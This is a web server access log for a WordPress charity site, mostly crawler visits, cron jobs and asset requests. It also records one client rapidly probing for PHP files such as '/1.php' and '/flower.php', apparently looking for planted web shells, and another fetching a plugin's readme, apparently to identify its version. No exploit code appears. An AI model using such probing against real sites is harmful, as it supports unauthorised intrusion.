66.29.132.124 - - [10/Jan/2025:01:57:16 -0500] "POST /wp-cron.php?doing_wp_cron=1736492235.8918459415435791015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [10/Jan/2025:01:57:28 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=ZdUbaG3wzjyL8yTv7xPYG1Q5DTXP5X4r&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.249.79.160 - - [10/Jan/2025:01:57:33 -0500] "GET /commodity/110114.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.191.219.130 - - [10/Jan/2025:02:14:24 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.130 - - [10/Jan/2025:02:14:28 -0500] "GET / HTTP/1.1" 200 19613 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.130 - - [10/Jan/2025:02:14:38 -0500] "GET / HTTP/1.1" 200 19613 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.79.1 - - [10/Jan/2025:02:24:19 -0500] "GET /commodity/X579095?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.160 - - [10/Jan/2025:02:54:47 -0500] "GET /profile.php/keyword/%E8%A1%A8%E7%A4%BA%E3%82%B5%E3%82%A4%E3%82%BA28cm HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:02:54:55 -0500] "GET /post.php/commodity/N76219?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
47.128.121.247 - - [10/Jan/2025:02:56:17 -0500] "GET / HTTP/1.1" 200 19613 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/charite-core/assets/css/progressbar.css?ver=1.0.0 HTTP/1.1" 200 322 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/charite-core/assets/css/nice-select.min.css?ver=1.0.0 HTTP/1.1" 200 789 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/charite-core/assets/css/magnific.min.css?ver=1.0.0 HTTP/1.1" 200 1401 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/charite-core/assets/css/spacing.min.css?ver=1.0.0 HTTP/1.1" 200 1968 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/give/assets/dist/css/give.css?ver=3.19.4 HTTP/1.1" 200 13358 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/charite-core/assets/css/slick.min.css?ver=1.0.0 HTTP/1.1" 200 493 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/give/assets/dist/css/give-donation-summary.css?ver=3.19.4 HTTP/1.1" 200 465 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/paystack-for-give/public/css/paystack-give-public.css?ver=2.0.3 HTTP/1.1" 200 98 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2 HTTP/1.1" 200 890 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/themes/charite/assets/css/flaticon.min.css?ver=1.0.1 HTTP/1.1" 200 607 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:19 -0500] "GET /wp-content/themes/charite/assets/css/fontawesome.min.css?ver=1.0.1 HTTP/1.1" 200 12382 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/themes/charite/assets/css/style.css?ver=1.0.1 HTTP/1.1" 200 24705 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/themes/charite/assets/css/bootstrap.min.css?ver=1.0.1 HTTP/1.1" 200 20360 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.34.0 HTTP/1.1" 200 3790 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.26.4 HTTP/1.1" 200 6466 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/uploads/elementor/css/post-10.css?ver=1694535114 HTTP/1.1" 200 313 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/themes/charite/assets/css/meanmenu.css?ver=1.0.1 HTTP/1.1" 200 751 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/themes/charite/style.css?ver=6.7.1 HTTP/1.1" 200 5586 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/uploads/2023/12/IMG_9213-274x249.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:20 -0500] "GET /wp-content/uploads/elementor/css/post-1943.css?ver=1702496016 HTTP/1.1" 200 330 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/plugins/charite-core/assets/css/custom-icon.css?ver=1.0 HTTP/1.1" 200 644 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3 HTTP/1.1" 200 284 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 HTTP/1.1" 200 12164 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/uploads/2023/12/WhatsApp-Image-2023-12-05-at-15.52.26-e1701788029641.jpeg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/uploads/2023/08/cropped-cropped-Logo-3.png HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/uploads/2023/07/cause-middle2.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:21 -0500] "GET /wp-content/themes/charite/assets/shape/title-underline.png HTTP/1.1" 206 500 "https://tacafoundation.org/wp-content/themes/charite/assets/css/style.css?ver=1.0.1" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/08/portfolio1.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/12/WhatsApp-Image-2023-12-05-at-15.52.23.jpeg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/12/IMG_9213-scaled.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/12/IMG_9223-scaled.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/12/0K4A8034-1-scaled.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/08/payment-e1701779237647.png HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:22 -0500] "GET /wp-content/uploads/2023/12/0K4A8040-1-scaled.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:23 -0500] "GET /wp-content/uploads/2023/12/pad.png HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:23 -0500] "GET /wp-content/uploads/2023/12/fbetvv-274x249.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.247 - - [10/Jan/2025:02:56:23 -0500] "GET /wp-content/uploads/2023/08/footer-bg.jpg HTTP/1.1" 206 500 "https://tacafoundation.org/wp-content/uploads/elementor/css/post-1943.css?ver=1702496016" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /autoload_classmap.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /post.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /1.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /flower.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /admin.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:07 -0500] "GET /file.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:08 -0500] "GET /meta.php HTTP/1.1" 404 1251 "-" "-"
52.147.160.127 - - [10/Jan/2025:03:29:08 -0500] "GET /index.php HTTP/1.1" 200 0 "-" "-"
66.249.79.172 - - [10/Jan/2025:03:31:19 -0500] "GET /post.php/commodity/832262.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.29.132.124 - - [10/Jan/2025:03:31:44 -0500] "POST /wp-cron.php?doing_wp_cron=1736497903.2851500511169433593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [10/Jan/2025:03:31:52 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=63gH3yc6qfYtei6pILchj14ODasl5fap&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.249.79.8 - - [10/Jan/2025:03:59:09 -0500] "GET /commodity/E463818?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.29.132.124 - - [10/Jan/2025:04:13:57 -0500] "GET / HTTP/1.1" 200 108798 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
51.8.102.46 - - [10/Jan/2025:04:54:32 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.46 - - [10/Jan/2025:04:54:32 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
94.228.162.228 - - [10/Jan/2025:05:18:29 -0500] "GET /wp-content/plugins/give/readme.txt HTTP/1.1" 200 16752 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:51.0) Gecko/20100101 Firefox/51.0"
66.249.79.8 - - [10/Jan/2025:05:27:21 -0500] "GET /commodity/L746679?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.264 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:05:50:36 -0500] "GET /post.php/commodity/122832.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:06:22:45 -0500] "GET /commodity/J575623?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.2 - - [10/Jan/2025:06:32:23 -0500] "GET /commodity/V95831?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
49.51.204.74 - - [10/Jan/2025:06:53:29 -0500] "GET / HTTP/1.1" 200 0 "http://www.tacafoundation.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.29.132.124 - - [10/Jan/2025:06:55:47 -0500] "POST /wp-cron.php?doing_wp_cron=1736510146.0031709671020507812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.29.132.124 - - [10/Jan/2025:06:55:58 -0500] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=Fb5IRViMphDfLlmayXfxy6iRBP3N7Hf7&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
66.249.79.2 - - [10/Jan/2025:07:32:50 -0500] "GET /commodity/L520765?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:33:44 -0500] "GET /commodity/J878003?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:33:58 -0500] "GET /commodity/R838777?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:07:36:07 -0500] "GET /commodity/U224790?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:36:32 -0500] "GET /keyword/BDSM HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:37:10 -0500] "GET /commodity/I57078?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:39:24 -0500] "GET /commodity/Z689025?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:07:40:00 -0500] "GET /commodity/R96425?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:07:40:12 -0500] "GET /commodity/B25169?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:08:13:34 -0500] "GET /post.php/commodity/53145.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:08:25:11 -0500] "GET /commodity/H244797?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.1 - - [10/Jan/2025:08:54:58 -0500] "GET /commodity/S40188?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [10/Jan/2025:09:04:17 -0500] "GET /keyword/Ryoya HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.95.119.160 - - [10/Jan/2025:09:12:30 -0500] "GET /contact-us/ HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
45.95.119.160 - - [10/Jan/2025:09:12:31 -0500] "GET / HTTP/1.1" 200 19613 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
45.95.119.160 - - [10/Jan/2025:09:12:32 -0500] "GET /contact-us/ HTTP/1.1" 404 1251 "https://tacafoundation.org/contact-us/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
66.249.79.2 - - [10/Jan/2025:09:35:16 -0500] "GET /commodity/A609700?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [10/Jan/2025:10:08:58 -0500] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.173 - - [10/Jan/2025:10:09:55 -0500] "GET /post.php/commodity/876973.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.200 - - [10/Jan/2025:10:19:55 -0500] "GET /post.php/commodity/K527628?c=goods&t=lic HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.38 - - [10/Jan/2025:10:48:14 -0500] "GET /post.php/commodity/30367.html?product HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.143.138.239 - - [10/Jan/2025:10:58:04 -0500] "GET / HTTP/1.1" 200 23499 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
66.29.132.124 - - [10/Jan/2025:11:41:16 -0500] "POST /wp-cron.php?doing_wp_cron=1736527276.1349120140075683593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.1; https://tacafoundation.org"
